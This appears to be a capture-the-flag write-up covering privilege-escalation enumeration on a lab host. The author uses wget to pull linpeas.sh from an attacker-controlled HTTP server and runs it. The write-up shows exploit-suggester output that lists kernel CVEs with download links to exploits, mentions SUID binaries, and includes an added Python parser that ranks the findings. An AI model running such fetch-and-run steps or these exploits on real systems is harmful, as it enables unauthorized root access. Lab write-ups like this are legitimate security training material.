PEAS


After gaining a foothold and running some basic enumeration, I decide to run PEAS.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ wget http://10.10.14.5:8000/linpeas.sh ; chmod 777 linpeas.sh
--2023-01-17 23:51:19--  http://10.10.14.5:8000/linpeas.sh
connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 827827 (808K) [text/x-sh]
saving to: ‘linpeas.sh’
 
linpeas.sh          100%[===================>] 808.42K  4.13MB/s    in 0.2s    
 
2023-01-17 23:51:20 (4.13 MB/s) - ‘linpeas.sh’ saved [827827/827827]

I transferred PEAS over HTTP.

Executing PEAS

The target system is vulnerable to CVE-2021-4034

╔══════════╣ Executing Linux Exploit Suggester
 https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2017-16995] eBPF_verifier
 
   details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   exposure: probable
   tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
   download url: https://www.exploit-db.com/download/45010
   comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
 
[+] [CVE-2021-4034] PwnKit
 
   details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   exposure: probable
   tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,[ debian=7|8|9|10|11 ],fedora,manjaro
   download url: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   exposure: less probable
   tags: ubuntu=20.04{kernel:5.8.0-*}
   download url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   comments: ip_tables kernel module must be loaded
 
[+] [CVE-2017-6074] dccp
 
   details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   exposure: less probable
   tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
   download url: https://www.exploit-db.com/download/41458
   comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
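
For triage, the suggester block above can be parsed into records so that findings are ordered by exposure and each one's stated precondition (its comments line) is surfaced for checking on the host. This is an added example, not part of the original notes or of linux-exploit-suggester; the sample is an abridged copy of the output above, and the function names are hypothetical.

```python
import re

# Constructed sample: abridged copy of the suggester output shown above.
SAMPLE = """\
[+] [CVE-2017-16995] eBPF_verifier

   details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   exposure: probable
   comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2021-4034] PwnKit

   details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   exposure: probable

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   exposure: less probable
   comments: ip_tables kernel module must be loaded
"""

HEADER = re.compile(r"^\[\+\]\s+\[(CVE-\d{4}-\d+)\]\s+(.+?)\s*$")
FIELD = re.compile(r"^\s+([a-z][a-z -]*?):\s*(.*?)\s*$")
# Only the exposure values seen on this page are ranked; others sort last.
RANK = {"probable": 0, "less probable": 1}

def parse_findings(text):
    """Turn the '[+] [CVE-...] name' blocks into one dict per finding."""
    findings, current = [], None
    for line in text.splitlines():
        header = HEADER.match(line)
        if header:
            current = {"cve": header.group(1), "name": header.group(2)}
            findings.append(current)
            continue
        field = FIELD.match(line)
        if field and current is not None:  # ignore fields before any header
            current[field.group(1)] = field.group(2)
    return findings

def triage(findings):
    """Order by exposure (stable) and pair each CVE with its precondition."""
    ordered = sorted(findings, key=lambda f: RANK.get(f.get("exposure"), len(RANK)))
    return [(f["cve"], f.get("exposure", "unknown"), f.get("comments", "none listed"))
            for f in ordered]

if __name__ == "__main__":
    for cve, exposure, precondition in triage(parse_findings(SAMPLE)):
        print(f"{cve:<16}{exposure:<15}precondition: {precondition}")
```

A finding with no comments line, such as CVE-2021-4034 here, has no precondition listed by the tool and comes back as "none listed".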

Some more vulnerabilities discovered by PEAS

Printer?

A more detailed view of binaries with the SUID permission set. There are a few that I could try out.